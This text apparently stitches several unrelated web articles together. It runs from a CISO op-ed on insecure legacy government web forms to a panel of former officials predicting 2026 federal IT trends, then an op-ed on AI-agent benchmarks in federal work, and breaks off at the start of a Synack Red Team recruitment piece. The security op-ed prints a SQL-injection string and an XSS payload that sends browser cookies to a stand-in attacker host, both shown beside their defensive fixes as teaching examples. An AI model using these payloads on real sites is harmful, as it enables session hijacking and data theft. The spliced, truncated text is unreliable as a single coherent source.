Government agencies face a security challenge hiding in plain sight: outdated web forms that collect citizen data through systems built years — sometimes decades — ago. While agencies invest heavily in perimeter security and advanced threat detection, many continue using legacy forms lacking modern encryption, authentication capabilities and compliance features. These aging systems process Social Security numbers, financial records, health information and security clearance data through technology that falls short of current federal security standards.
The scale of this challenge is substantial. Government organizations allocate 80% of IT budgets to maintaining legacy systems, leaving modernization efforts chronically underfunded. Critical legacy systems cost hundreds of millions annually to maintain, with projected spending reaching billions by 2030. Meanwhile, government data breaches cost an average of $10 million per incident in the United States — the highest globally.
The encryption gap that persists
Despite the 2015 federal mandate establishing HTTPS as the baseline for all government websites, implementation gaps continue. The unencrypted HTTP protocol exposes data to interception, manipulation and impersonation attacks. Attackers positioned on the network can read Social Security numbers, driver’s license numbers, financial account numbers and login credentials transmitted in plain text.
Legacy government web forms that do implement encryption often use outdated protocols no longer meeting regulatory requirements. Older systems rely on deprecated hashing algorithms like SHA-1 and outdated TLS versions vulnerable to known exploits. Without proper security header enforcement, browsers don’t automatically use secure connections, allowing users to inadvertently access unencrypted form pages.
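The gap between a deprecated digest and current practice is easy to see in code. Below is a minimal Python sketch contrasting a bare SHA-1 hash with a salted, slow key-derivation function; the password and iteration count are illustrative, not taken from any agency standard.

```python
import hashlib
import secrets

password = b"correct horse battery staple"  # illustrative credential

# DEPRECATED: a bare SHA-1 digest is fast to brute-force and collision-prone
weak = hashlib.sha1(password).hexdigest()

# CURRENT PRACTICE: a salted, deliberately slow KDF such as PBKDF2-HMAC-SHA256
salt = secrets.token_bytes(16)
strong = hashlib.pbkdf2_hmac("sha256", password, salt, 600_000)

print(len(strong))  # 32-byte derived key
```

The salt and high iteration count are the point: they make precomputed-table and brute-force attacks dramatically more expensive than a single unsalted SHA-1 pass.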
Application-layer vulnerabilities
Beyond transmission security, legacy web forms suffer from fundamental application vulnerabilities. Testing reveals that over 80% of government web applications remain prone to SQL injection attacks. Unlike private sector organizations that remediate 73% of identified vulnerabilities, government departments remediate only 27% — the lowest among all industry sectors.
SQL injection remains one of the most dangerous attacks against government web forms. Legacy forms constructing database queries using string concatenation rather than parameterized queries introduce serious vulnerabilities. This insecure practice allows attackers to inject malicious SQL code, potentially gaining unauthorized access to national identity information, license details and Social Security numbers. Attackers exploit these vulnerabilities to alter or delete identity records, manipulate data to forge official documents, and exfiltrate entire databases containing citizen information.
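The difference between the two query styles is small in code but decisive in effect. Here is a minimal Python sketch using an in-memory sqlite3 database; the table, names and payload are hypothetical, chosen only to illustrate the pattern.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE citizens (id INTEGER PRIMARY KEY, ssn TEXT, name TEXT)")
conn.execute("INSERT INTO citizens (ssn, name) VALUES (?, ?)", ("123-45-6789", "Jane Doe"))

user_input = "Jane Doe' OR '1'='1"  # a classic injection payload

# VULNERABLE: string concatenation lets the payload rewrite the query,
# turning WHERE name = 'Jane Doe' OR '1'='1' into a match-everything clause:
# query = f"SELECT ssn FROM citizens WHERE name = '{user_input}'"

# SAFE: a parameterized query treats the payload as literal data, not SQL
rows = conn.execute(
    "SELECT ssn FROM citizens WHERE name = ?", (user_input,)
).fetchall()

print(rows)  # empty: no citizen is literally named "Jane Doe' OR '1'='1"
```

With the placeholder form, the database driver binds the input as a value, so the injected `OR '1'='1'` never becomes part of the query logic.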
Cross-site scripting (XSS) affects 75% of government applications. XSS attacks enable attackers to manipulate users’ browsers directly, capture keystrokes to steal credentials, obtain session cookies to hijack authenticated sessions, and redirect users to malicious websites. Legacy forms also lack protection against CSRF attacks, which trick authenticated users into performing unwanted actions without their knowledge.
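Output escaping is the baseline XSS defense those legacy forms typically lack. A minimal Python sketch, using the standard library's `html.escape` and a hypothetical malicious submission:

```python
import html

# A malicious form submission attempting a stored XSS attack (illustrative)
submitted_name = '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'

# VULNERABLE: interpolating raw input into HTML would execute the script
# page = f"<p>Welcome, {submitted_name}</p>"

# SAFE: escape user-supplied text before it reaches the rendered page
page = f"<p>Welcome, {html.escape(submitted_name)}</p>"

print(page)  # the <script> tag is rendered as inert text, not executed
```

Real applications layer this with templating engines that auto-escape by default and a Content Security Policy, but the principle is the same: untrusted input never reaches the browser as markup.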
Compliance imperative
Federal agencies must comply with the Federal Information Security Management Act (FISMA), which requires implementation of National Institute of Standards and Technology SP 800-53 security controls including access control, configuration management, identification and authentication, and system and communications protection. Legacy web forms fail FISMA compliance when they cannot implement modern encryption for data in transit and at rest, lack multi-factor authentication capabilities, don’t maintain comprehensive audit logs, use unsupported software without security patches, and operate with known exploitable vulnerabilities.
Federal agencies using third-party web form platforms must ensure vendors have appropriate FedRAMP authorization. FedRAMP requires security controls compliance incorporating NIST SP 800-53 Revision 5 controls, impact level authorization based on data sensitivity, and continuous monitoring of encryption methods and security posture. Legacy government web forms implemented through non-FedRAMP-authorized platforms represent unauthorized use of non-compliant systems.
Real-world transmission failures
The gap between policy and practice is stark. Federal agencies commonly require contractors to submit forms containing Social Security numbers, dates of birth, driver’s license numbers, criminal histories and credit information via standard non-encrypted email as plain PDF attachments. When contractors offer encrypted alternatives, badge offices often resist changing established procedures.
Most federal agencies lack basic secure portals for PII submission, forcing reliance on email despite policies requiring encryption. Standard Form 86 for national security clearances and other government forms are distributed as fillable PDFs that can be completed offline, saved unencrypted, and transmitted through insecure channels — despite containing complete background investigation data for millions of federal employees and contractors.
Recent breaches highlight ongoing vulnerabilities. Federal departments have suffered breaches where hackers accessed networks through compromised credentials. Congressional offices have been targeted by suspected foreign actors. Private contractors providing employee screening services have confirmed massive data breaches affecting millions, with unauthorized access lasting months before detection.
What agencies must do now
Government agencies must immediately enforce HTTPS encryption for all web form pages using HTTP strict transport security, deploy server-side input validation to prevent SQL injection and XSS attacks, implement anti-CSRF tokens for each form session, add bot protection, enable comprehensive access logging, and conduct regular vulnerability scanning for Open Worldwide Application Security Project Top 10 vulnerabilities.
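Two of those controls can be sketched concisely. Below is a minimal Python illustration, assuming a hypothetical server-side session ID and secret key: the HSTS response header that forces browsers onto HTTPS, and an HMAC-based anti-CSRF token issued per session and verified on every form submission.

```python
import hashlib
import hmac
import secrets

# HSTS: a response header instructing browsers to use HTTPS for a year
hsts_header = ("Strict-Transport-Security",
               "max-age=31536000; includeSubDomains; preload")

# Anti-CSRF: derive a per-session token the attacker cannot forge.
# In practice SECRET_KEY would come from server configuration, not be
# generated at import time.
SECRET_KEY = secrets.token_bytes(32)

def issue_csrf_token(session_id: str) -> str:
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def verify_csrf_token(session_id: str, token: str) -> bool:
    expected = issue_csrf_token(session_id)
    # constant-time comparison avoids timing side channels
    return hmac.compare_digest(expected, token)

token = issue_csrf_token("session-abc123")
assert verify_csrf_token("session-abc123", token)          # legitimate POST
assert not verify_csrf_token("session-abc123", "forged")   # forged request rejected
```

The token is embedded in each rendered form and checked server-side on submission, so a cross-site request made without it fails even if the user's session cookie rides along.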
Long-term security requires replacing legacy forms with FedRAMP-authorized platforms that provide end-to-end encryption using AES-256 for data at rest and TLS 1.3 for data in transit, multi-factor authentication for both citizens and government staff, role-based access control with granular permissions, comprehensive audit trails capturing all data access events, and automated security updates addressing emerging vulnerabilities.
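Enforcing TLS 1.3 as a floor is a one-line configuration in most modern stacks. A minimal sketch using Python's standard `ssl` module (certificate loading omitted for brevity):

```python
import ssl

# Build a server-side TLS context that refuses anything older than TLS 1.3
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.minimum_version = ssl.TLSVersion.TLSv1_3

# Handshakes offering SSLv3 or TLS 1.0/1.1/1.2 are now rejected outright
print(ctx.minimum_version)
```

A real deployment would also load the server certificate and key via `ctx.load_cert_chain(...)`; the point here is simply that deprecated protocol versions can be switched off explicitly rather than relying on library defaults.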
Secure data collection
The real question is not whether government agencies can afford to modernize outdated web forms, but whether they can afford the consequences of failing to do so. Every unencrypted submission, every SQL injection vulnerability and every missing audit trail represents citizen data at risk and accumulating regulatory violations. Federal mandates established the security standards years ago. Implementation can no longer wait.
The technology to solve these problems exists today. Modern secure form platforms offer FedRAMP authorization, end-to-end encryption, multi-factor authentication, comprehensive audit logging, and automated compliance monitoring. These platforms can replace legacy systems while improving user experience, reducing operational costs, and meeting evolving security requirements.
Success requires more than technology adoption — it demands organizational commitment. Agency leadership must prioritize web form security, allocate adequate budgets for modernization, and establish clear timelines for legacy system replacement. Security and IT teams need the resources and authority to implement proper controls.
Government web forms represent the primary interface between citizens and their government for countless critical services. When these forms are secure, they enable efficient, trustworthy digital government services. When they’re vulnerable, they undermine public confidence in government’s ability to protect sensitive information. The path forward is clear: Acknowledge the severity of legacy web form vulnerabilities, commit resources to address them systematically, and implement modern secure solutions. The cost of action is significant, but the cost of inaction — measured in breached data, compromised systems, regulatory penalties and lost public trust — is far higher.
Frank Balonis is chief information security officer and senior vice president of operations and support at Kiteworks.
Let’s start with the good news: artificial intelligence may NOT be the buzzword for 2026.
What will be the most talked about federal IT and/or acquisition topic for this year remains up for debate. While AI will definitely be part of the conversation, at least some experts believe other topics will emerge over the next 12 months. These range from the Defense Department’s push for “speed to capability” to resilient innovation to workforce transformation.
Federal News Network asked a panel of former federal technology and procurement executives for their opinions on which federal IT and acquisition storylines they are following over the next 12 months. If you’re interested in previous years’ predictions, here is what experts said about 2023, 2024 and 2025.
The panelists are:
Jonathan Alboum, federal chief technology officer for ServiceNow and former Agriculture Department CIO.
Melvin Brown, vice president and chief growth officer at CANI and a former deputy CIO at the Office of Personnel Management.
Matthew Cornelius, managing director of federal industry at Workday and former OMB and Senate staff member.
Kevin Cummins, a partner with the Franklin Square Group and former Senate staff member.
Michael Derrios, the new executive director of the Greg and Camille Baroni Center for Government Contracting at George Mason University and former State Department senior procurement executive.
Julie Dunne, a principal with Monument Advocacy and former commissioner of GSA’s Federal Acquisition Service.
Mike Hettinger, founding principal of Hettinger Strategy Group and former House staff member.
Nancy Sieger, a partner at Guidehouse’s Financial Services Sector and a former IRS CIO.
What are two IT or acquisition programs/initiatives that you are watching closely for signs of progress and why?
Brown: Whether AI acquisition governance becomes standard: templates, clauses and evaluation norms. 2026 is where agencies turn OMB AI memos into repeatable acquisition artifacts through solicitation language, assurance evidence, testing/monitoring expectations, and privacy and security gates. The 2025 memos are the anchor texts. I’m watching for signals such as common clause libraries, governmentwide “minimum vendor evidence” requirements and how agencies operationalize “responsible AI” in source selections.
The Cybersecurity Maturity Model Certification (CMMC) phased rollout and how quickly it becomes a de facto barrier to entry. Because the rollout is phased over multiple years starting in November 2025, 2026 is the first full year where you can observe how often contracting officers insert the clause and how primes enforce flow-downs. The watch signals include protest activity, supply-chain impacts and whether smaller firms get crowded out or supported.
Hettinger: Related to the GSA OneGov initiative, there’s continuing pressure on the middlemen (resellers and systems integrators) to deliver more value for less. This theme emerged in early 2025, but it will continue to be front and center throughout 2026. How those facing the pressure respond to the government’s interests will tell us a lot about how IT acquisition is going to change in the coming years. I’ll be watching that closely.
The other place to watch more broadly is how the government is going to leverage AI. If 2025 was about putting the pieces in place to buy AI tools, 2026 is going to be about how agencies are able to leverage those tools to bring efficiency and effectiveness in a host of new areas.
Cornelius: The first is watching the Hill to see if the Senate can finally get the Strengthening Agency Management and Oversight of Software Assets (SAMOSA) Act passed and to the President’s desk. While a lot of great work has already happened — and will continue to happen — at GSA around OneGov, there is only so much they can do on their own. If Congress forces agencies to do the in-depth analysis and reporting required under SAMOSA, it will empower GSA, as well as OMB and Congress, to have the type of data and insights needed to drive OneGov beyond just cost savings to more enterprise transformation outcomes for their agency customers. This would generate value at an order of magnitude beyond what they have achieved thus far.
The second is the implementation of the recent executive order that created the Genesis Mission initiative. The mission is focused on ensuring that the Energy Department and the national labs can hire the right talent and marshal the right resources to help develop the next generation of biotechnology, quantum information science, advanced manufacturing and other critical capabilities that empower America’s global leadership for the next few generations. Seeing how DOE and the Office of Science and Technology Policy (OSTP) partner collaboratively with industry to execute this aspirational, but necessary, nationwide effort will be revelatory and insightful.
Cummins: Will Congress reverse its recent failure to reauthorize the Technology Modernization Fund (TMF)? President Donald Trump stood up the TMF during his first term and it saw a significant funding infusion by President Joe Biden. Watching the TMF just die with a whimper will make me pessimistic about reviving the longstanding bipartisan cooperation on modernizing federal IT that existed before the Department of Government Efficiency (DOGE).
I will be closely watching how well the recently-announced Tech Force comes together. Its goal of recruiting top engineers to serve in non-partisan roles focused on technology implementation sounds a lot like the U.S. Digital Service started by President Barack Obama, which then became the U.S. DOGE Service. I would like to see Tech Force building a better government with some of the enthusiasm that DOGE showed for cutting it.
Sieger: I’m watching intensely how agencies manage the IT talent exodus triggered by DOGE-mandated workforce reductions and return-to-office requirements. The unintended consequence we’re already observing is the disproportionate loss of mid-career technologists, the people who bridge legacy systems knowledge with modern cloud and AI capabilities.
Agencies are losing their most marketable IT talent first, while retention of personnel managing critical legacy infrastructure creates technical debt time bombs. At Guidehouse, we’re fielding unprecedented requests for cybersecurity, cloud architecture and data engineering services. The question heading into 2026 is whether agencies can rebuild sustainable IT operating models or whether they become permanently dependent on contractor support, fundamentally altering the government’s long-term technology capacity.
The real risk, as I see it, is that mission-critical systems are losing institutional knowledge faster than documentation or modernization can compensate. Agencies need to watch for and mitigate increased system outages, security incidents and failed modernization projects as this workforce disruption cascades through 2026.
Sticking with the above theme, it does bear watching how the new federal Tech Force hiring initiative succeeds. The federal Tech Force initiative signals a major shift in how the federal government sources and deploys modern technology talent. As agencies bring in highly skilled technologists focused on AI, cloud, cybersecurity and agile delivery, the expectations for speed, engineering rigor and product-centric outcomes will rise. This will reshape how agencies engage industry partners, favoring firms that can operate at comparable technical and cultural velocity.
The initiative also introduces private sector thinking into government programs, influencing requirements, architectures and vendor evaluations. This creates both opportunity and pressure. Organizations aligned to modern delivery models will gain advantage, while legacy approaches may struggle to adapt. Federal Tech Force serves as an early indicator of how workforce decisions are beginning to influence acquisition approaches and modernization priorities across government.
Dunne: Title 41 acquisition reform. The House Armed Services Committee and House Oversight Committee worked together to pass a 2026 defense authorization bill out of the House with civilian or governmentwide (Title 41) acquisition reform proposals. These reform proposals in the House NDAA bill included increasing various acquisition thresholds (micro-purchase and simplified acquisition thresholds and cost accounting standards) and language on advance payments to improve buying of cloud solutions. Unfortunately, these governmentwide provisions were left out of the final NDAA agreement, leaving, in some cases, different rules for the civilian and defense sectors. I’m hopeful that Congress will try again on governmentwide acquisition reform.
Office of Centralized Acquisition Services (OCAS). GSA launched OCAS late this year to consolidate and streamline contracting for common goods and services in accordance with the March 2025 executive order (14240). Always a good exercise to think about how to best consolidate and streamline contracting vehicles. We’ve been here before and I think OCAS has a tough mission as agencies often want to do their own thing. If given sufficient resources and leadership attention, perhaps it will be different this time.
FedRAMP 20x. Earlier this year, GSA’s FedRAMP program management office launched FedRAMP 20x to reform the process and bring efficiencies through automation and expand the availability of cloud service provider products for agencies. All great intentions, but as we move into the next phase of the effort and into FedRAMP moderate type solutions, I hope the focus remains on the security mission and the original intent to measure once, use many times for the benefit of agencies. Also, FedRAMP authorization expires in December 2027 – which is not that far away in congressional time.
Alboum: In the coming year, I’m paying close attention to how agencies manage AI efficiency and value as they move from pilots to production. As budgets tighten, agencies need a clearer picture of which models are delivering results, which aren’t, and where investments are being duplicated.
I’m also watching enterprise acquisition and software asset management efforts. The Strengthening Agency Management and Oversight of Software Assets (SAMOSA) Act has been floating around Congress for the last few years. I’m curious to see whether it will ultimately become law. Its provisions reflect widely acknowledged best practices for controlling software spending and align with the administration’s PMA objective to “consolidate and standardize systems, while eliminating duplicative ones.” How agencies manage their software portfolios will be a crucial test of whether efficiency goals are turning into lasting structural change, or just short-term fixes.
Derrios: Watching how GSA’s OneGov initiative shapes up will be important because contract consolidation without an equal focus on demand forecasting, standardization and potential requirements aggregation may not yield the intended results. There needs to be a strong focus on acquisition planning between GSA and its federal agency customers in addition to any movement of contracts.
In 2025, the administration revamped the FAR, which hadn’t been reviewed holistically in 40 years. So in 2026, what IT/acquisition topic(s) would you like to see the administration take on that has long been overlooked and/or underappreciated for the impact change and improvements could have, and why?
Cummins: Despite the recent Trump administration emphasis on commercialization, it is still too hard for innovative companies to break into the federal market. Sometimes agencies will move mountains to urgently acquire a new technology, like we have seen recently with some artificial intelligence and drones initiatives. But a commercial IT company generally has to partner with a reseller and get third-party accreditation (CMMC, FedRAMP, etc.) just to get access to a federal customer. Moving beyond the FAR rewrite, could the government give up some of the intellectual property and other requirements that make it difficult for commercial companies to bid as a prime or sell directly to an agency outside of an other transaction agreement (OTA)? It would also be helpful to see more FedRAMP waivers for low-risk cloud services.
Cornelius: It’s been almost 50 years since foundational law and policy set the parameters we still follow today around IT accessibility. During my time in the Senate, I drafted the provision in the 2023 omnibus appropriations bill that required GSA and federal agencies to perform comprehensive assessments of accessibility compliance across all IT and digital assets throughout the government. Now, with a couple years of analysis and with many thoughtful recommendations from GSA and OMB, it is time for Congress to make critical updates in law to improve the accessibility of any capabilities the government acquires or deploys. 2026 could be a year of rare bipartisan, bicameral collaboration on digital accessibility, which could then underpin the administration’s America by Design initiative and ensure important accessibility outcomes from all vendors serving government customers are delivered and maintained effectively.
Derrios: The federal budgeting process really needs a reboot. Static budgets do not align with multi-year missions where risks are continuous, technology changes at lightning speed, and world events impact aging cost estimates. And without a real “return on investment” mentality incorporated into the budgeting process, under-performing programs with high sunk-costs will continue to be supported. But taxpayers shouldn’t have to sit through a bad movie just because they already paid for the ticket.
Brown: I’m watching how agencies continue to move toward the implementation of zero trust and how the data layer becomes the budget fight. With federal guides emphasizing data security, the 2026 question becomes, do programs converge on fewer, interoperable controls, or do they keep buying overlapping tools? My watch signals include requirements that prioritize data tagging/classification, attribute-based access, encryption/key management and auditability as “must haves” in acquisitions.
Alboum: Over the past few years, the federal government has made significant investments in customer experience and service delivery. The question now is whether those gains can be sustained amid federal staffing reductions.
This challenge is closely tied to the “America by Design” executive order, which calls for redesigned websites where people interact with the government. A beautiful, easy-to-use website is an excellent start. However, the public expects a great end-to-end experience across all channels, which aligns directly with the administration’s PMA objective to build digital services for “real people, not bureaucracy.”
So, I’ll be watching to see if we meet these expectations by investing in AI and other technologies to lock in previous gains and improve the way we serve the public. With the proper focus, I’m confident that we can positively impact the public’s perception and trust in government.
Hettinger: Setting aside the known and historic challenges with the TMF, we really do need to figure out how to buy IT more effectively, at a pace consistent with the needs of agencies. Maybe some of that is addressed in the FAR changes, but those are only going to take us so far (no pun intended). If we think outside the box, maybe we can find a way to make real progress in IT funding and acquisition in a way that gets the right technology tools in the hands of the right people more quickly.
Dunne: I think follow through on the initiatives launched in 2025 will be important to focus on in 2026. The formal rulemaking process for the RFO will launch in 2026 and will be an important part of that follow through. And now that we have a confirmed Office of Federal Procurement Policy administrator, I think 2026 will be an important year for industry engagement on topics like the RFO.
Sieger: If the administration could tackle one long-overlooked issue with transformative impact, it should be modernizing how security clearances are granted, maintained and reciprocally recognized for contractor personnel supporting federal IT initiatives.
The current clearance system regularly creates 6-to-12 month delays in staffing critical IT programs, particularly in cybersecurity and AI. Agencies lose qualified contractors to private sector opportunities during lengthy adjudication periods. The lack of true clearance reciprocity means contractors moving between agency projects often restart the process, wasting resources and creating knowledge gaps on programs.
This is a strategic vulnerability. Federal IT modernization depends on contractor expertise for specialized skills government cannot hire directly. When clearance processes take longer than typical IT project phases, agencies either compromise on talent quality or delay mission-critical initiatives. The opportunity cost is measured in delayed outcomes and increased cyber risk.
Implementing continuous vetting for contractor populations, establishing true cross-agency clearance reciprocity, and creating “clearance portability” would benefit emerging technology areas such as AI, quantum and advanced cybersecurity, where talent competition is fiercest. From Guidehouse’s perspective, we see clients repeatedly unable to staff approved projects because cleared personnel aren’t available, not because talent doesn’t exist.
This reform would have cascading benefits: faster modernization, better talent retention, reduced costs and improved security through continuous monitoring rather than point-in-time investigations.
If 2025 has been all about cost savings and efficiencies, what do you think will emerge as the buzzword of 2026?
Brown: “Speed to capability” acquisition models spreading beyond DoD. The drone scaling example is a concrete indicator of a broader push. The watch signals for me are increased use of rapid pathways, shorter contract terms, modular contracting and more frequent recompetes to keep pace with technology change.
Cornelius: Governmentwide human resource transformation.
Dunne: AI again. How the government uses it to facilitate delivery of citizen services and how AI tools will assist with the acquisition process, and AI-enabled cybersecurity attacks. I know that’s not one word, but it’s a huge risk to watch and only a matter of time before our adversaries find success in attacking federal systems with an AI-enabled cyberattack, and federal contractors will be on the hook to mitigate such risks.
Cummins: Fraud prevention. While combating waste, fraud and abuse is a perennial issue, the industrial scale fraud revealed in Minnesota highlights a danger from how Congress passed COVID pandemic-era spending packages without the same level of checks and balances that were put in place for earlier Obama-era stimulus spending. Federal government programs generally still have a lot of room for improvement when it comes to preventing improper payments, such as by using better identity and access management and other security tools. Stopping fraud is also one of the few remaining areas of bipartisan agreement among policymakers.
Hettinger: DOGE may be gone, or maybe it’s not really gone, but I don’t know that cost savings and efficiencies are going to be pushed to the backburner. This administration comes at everything — at least from an IT perspective — as believing it can be done better, faster and cheaper. I expect that to continue not just into 2026 but for the rest of this administration.
Derrios: I think there will have to be a focus on how government needs and requirements are defined and how the remaining workforce can upskill to use technology as a force multiplier. If you don’t focus on what you’re buying and whether it constitutes a legitimate mission support need, any cost savings gained in 2025 will not be sustainable long-term. Balancing speed-to-contract and innovative buying methodologies with real requirements rigor is critical. And how your federal workforce uses the tools in the toolbox to yield maximum outcomes while trying to do more with less is going to take focused leadership. To me, all of this culminates in one word for 2026, and that’s producing “value” for federal missions.
Sieger: Resilient innovation. While 2025 focused intensely on cost savings and efficiencies, particularly through DOGE-mandated cuts, 2026’s emerging buzzword will be “resilient innovation.” Agencies are recognizing the need to continue advancing technological capabilities while maintaining operational continuity under constrained resources and heightened uncertainty.
The efficiency drives of 2025 exposed real vulnerabilities. Agencies lost institutional knowledge, critical systems became more fragile, and the pace of modernization actually slowed in many cases as talent departed and budgets tightened. Leaders now recognize that efficiency without resilience creates brittleness—systems that work well under ideal conditions but fail catastrophically when stressed.
Resilient innovation captures the dual mandate facing federal IT in 2026: Continue modernizing and adopting transformative technologies like AI, but do so in ways that don’t create new single points of failure, vendor dependencies or operational risks. It’s about building systems and capabilities that can absorb shocks — whether from workforce turnover, budget cuts, cyber incidents or geopolitical disruption — while still moving forward.
Alboum: Looking ahead, governance will take center stage across government. As AI, data and cybersecurity continue to scale, agencies will need stronger oversight, greater transparency and better coordination to manage complexity and maintain public trust. Governance won’t be a side conversation — it will be the foundation for everything that comes next.
Success will no longer be measured by how much AI is deployed, but by whether it is secure, compliant and delivering tangible mission value. The conversation will shift from “Do we have AI?” to “Is our AI safe, accurate and worth the investment?”
The vendor demo looks flawless, the script even cleaner. A digital assistant breezes through forms, updates systems and drafts policy notes while leaders watch a progress bar. The pitch leans on the promised agentic AI advantage.
Then the same agents face real public-sector work and stall on basic steps. The newest empirical benchmark from researchers at the nonprofit Center for AI Safety and data annotation company Scale AI finds current AI agents completing only a tiny fraction of jobs at a professional standard. Agents struggled to deliver production-ready outcomes on practical projects, including an explorer for World Happiness data, a short 2D promo, a 3D product animation, a container-home concept, a simple Suika-style game, and an IEEE-formatted manuscript. This new study should help provide some grounding on what agents can do inside federal programs today, why they will not replace government workers soon, and how to harvest benefits without risking mission, compliance or trust.
Benchmarks, not buzzwords, tell the story
Bold marketing favors smooth narratives of autonomy. Public benchmarks favor reality. In the WebArena benchmark, an agent built on GPT-4 achieved low end-to-end task success compared with human performance on real websites that require navigation, form entry and retrieval. The OSWorld benchmark assembles hundreds of desktop tasks across common apps with file handling and multi-step workflows, and documents persistent brittleness when agents face inconsistent interfaces or long sequences. Software results echo the same pattern. The original SWE-bench evaluates real GitHub issues across live repositories and shows that models generate useful patches, but need scaffolding and review to land working changes.
Duration matters. The H-CAST report correlates agent performance with human task time and finds strong results on short, well-bounded steps and sharp drop-offs on long, multi-hour work. That split maps directly to government operations. Agents can draft a memo outline or a SQL snippet. They falter when the job spans multiple systems, requires policy nuance, or demands meticulous document hygiene.
Building a public dashboard, as in the study run by researchers at the Center for AI Safety and Scale AI, is not a single chart; it is a reliable pipeline with provenance, documentation and accessible visuals. A 2D promo is not a storyboard alone; it is consistent assets, rights-safe media, captions and export settings that pass accessibility checks. A container-home concept is not a render; it is geometry, constraints and safety considerations that survive a technical review.
Federal teams must also contend with rules that raise the bar for autonomy. The AI Risk Management Framework from the National Institute of Standards and Technology gives a shared vocabulary for mapping risks and controls. These guardrails do not block generative AI in government; they make unsupervised autonomy a poor bet.
What this means for mission delivery, compliance and the workforce
The near-term value is clear. Treat agents as accelerators for specific tasks inside projects, not substitutes for the people who own outcomes. That approach matches field evidence. A large deployment in customer support showed double-digit gains in resolutions per hour when a generative assistant helped workers with suggested responses and knowledge retrieval, with the biggest lift for less-experienced staff. Translate that into federal work and you get faster first drafts, cleaner queries, more consistent formatting, and quicker starts on visuals, all checked by employees who understand policy, context and stakeholders.
Compliance reinforces the same division of labor. To run in production, systems must pass FedRAMP authorization, recordkeeping requirements and privacy controls. Content must meet Section 508 standards for accessibility. Security teams will lean on the joint secure AI development guidelines from the Cybersecurity and Infrastructure Security Agency and international partners to push model and system builders toward stronger practices. Auditors will use the Government Accountability Office’s accountability framework to probe governance, data quality and human oversight. Every one of those checkpoints increases the value of staff who can judge quality, interpret rules and stitch outputs into agency processes.
The fear that the large majority of federal work will be automated soon does not match the evidence. Agents still miss long sequences, stall at brittle interfaces, and struggle with multi-file deliverables. They produce assets that look plausible but fail validation or policy review. They need context from the people who understand stakeholders, statutes, and mission tradeoffs. That leaves plenty of room for productivity gains without mass replacement. It also shifts work toward specification, review and integration, roles that exist across headquarters and field offices.
A practical playbook federal leaders can use now
Plan for augmentation, not substitution. When I help government agencies adopt AI tools, we start by mapping projects into linked steps and flagging the ones that benefit from an assistive agent. Drafting a response to a routine inquiry, summarizing a meeting transcript, extracting fields from a form, generating a chart scaffold, and proposing test cases are all candidates. Require a human owner for every deliverable, and publish acceptance criteria that catch the common failure modes seen in the benchmarks, including missing assets, inconsistent naming, broken links and unreadable exports. Maintain an audit trail that shows prompts, sources and edits so the work is FOIA-ready.
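The acceptance criteria and audit trail described above can be sketched as a lightweight check. This is a minimal illustration, assuming a hypothetical record schema and a few of the failure modes named in the benchmarks; real agency criteria and FOIA recordkeeping formats would differ:

```python
from dataclasses import dataclass, field
from datetime import datetime, timezone

@dataclass
class AuditRecord:
    """Illustrative FOIA-ready audit entry: prompt, sources, edits, owner."""
    deliverable: str
    prompt: str
    sources: list
    human_owner: str
    edits: list = field(default_factory=list)
    timestamp: str = field(
        default_factory=lambda: datetime.now(timezone.utc).isoformat()
    )

def acceptance_check(assets: dict) -> list:
    """Flag common agent failure modes before a human owner signs off."""
    problems = []
    if not assets.get("files"):
        problems.append("missing assets")
    # Inconsistent naming: spaces or mixed case in delivered file names.
    for name in assets.get("files", []):
        if " " in name or name != name.lower():
            problems.append(f"inconsistent naming: {name}")
    # Broken links: anything the reviewer or a link checker marked dead.
    problems += [f"broken link: {url}" for url in assets.get("dead_links", [])]
    return problems
```

In practice, a deliverable would only move forward once `acceptance_check` returns an empty list and an `AuditRecord` has been stored alongside it.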
Ground the program in federal policy. Adopt the AI Risk Management Framework for risk mapping, and scope pilots to systems that can inherit or achieve FedRAMP authorization. Treat models and agents as components, not systems of record. Keep sensitive data inside authorized boundaries. Validate accessibility against Section 508 standards before anything goes public. For procurement, require vendors to demonstrate performance on public benchmarks like WebArena, OSWorld or SWE-bench using your agency’s constraints rather than glossy demos.
Staff and labor planning should reflect the new shape of work. Expect fewer hours on rote drafting and more time on specification, review and integration. Upskill employees to write good task definitions, evaluate model outputs, and enforce standards. Track acceptance rates, rework and defects by category so leaders can decide where to expand scope and where to hold the line. Publish internal guidance that explains when to use agents, how to attribute sources, and where human approval is mandatory. Share outcomes with the AI.gov community and look for common building blocks across agencies.
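Tracking acceptance rates, rework and defects by category can start as a simple tally. The sketch below assumes a minimal review log of (category, status) pairs; the category names and status labels are placeholders, not an agency standard:

```python
from collections import Counter

def summarize(reviews):
    """Compute per-category acceptance rates from a review log.

    Each review is a (category, status) pair, where status is one of
    'accepted', 'rework', or 'defect'.
    """
    totals, accepted = Counter(), Counter()
    for category, status in reviews:
        totals[category] += 1
        if status == "accepted":
            accepted[category] += 1
    return {c: accepted[c] / totals[c] for c in totals}

rates = summarize([
    ("drafting", "accepted"), ("drafting", "rework"),
    ("sql", "accepted"), ("visuals", "defect"),
])
# drafting: 0.5, sql: 1.0, visuals: 0.0
```

Leaders can then expand agent scope where acceptance rates are high and hold the line where rework dominates.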
A brief scenario shows how this plays out without wishful thinking. A program office stands up a pilot for public-facing dashboards using open data. An agent produces first-pass code to ingest and visualize the dataset, similar to the World Happiness example. A data specialist verifies source URLs, adds documentation, and applies the agency’s color and accessibility standards. A policy analyst reviews labels and context language for accuracy and plain English. The team stores prompts, code and decisions with metadata for audit. In the same sprint, a communications specialist uses an agent to draft a 30-second script for a social clip and a designer converts it into a simple 2D animation. The outputs move faster, quality holds steady, and the people who understand mission and policy remain responsible for the results.
AI agents deliver lift on specific tasks and stumble on long, cross-tool projects. Public benchmarks on the web, desktop and code back that statement with reproducible evidence. Federal policy adds governance that rewards augmentation over autonomy. The smart move for agencies is to put agents to work inside projects while employees stay accountable for outcomes, compliance and trust. That plan banks real gains today and sets agencies up for more automation tomorrow, without betting programs and reputations on a hype cycle.
It’s natural to wonder who makes up the Synack Red Team (SRT), our dedicated team of 1,500+ security researchers, and how they ended up finding vulnerabilities in our customers’ IT systems (with permission, of course).
Companies want assurance they’re not opening the front door to just anybody. Much like you wouldn’t want a stranger in your home without a warm introduction from a mutual friend, we’ll explain how SRT researchers become part of an elite, global community of ethical hackers with diverse skill sets.
Becoming an SRT Member Requires Building Trust
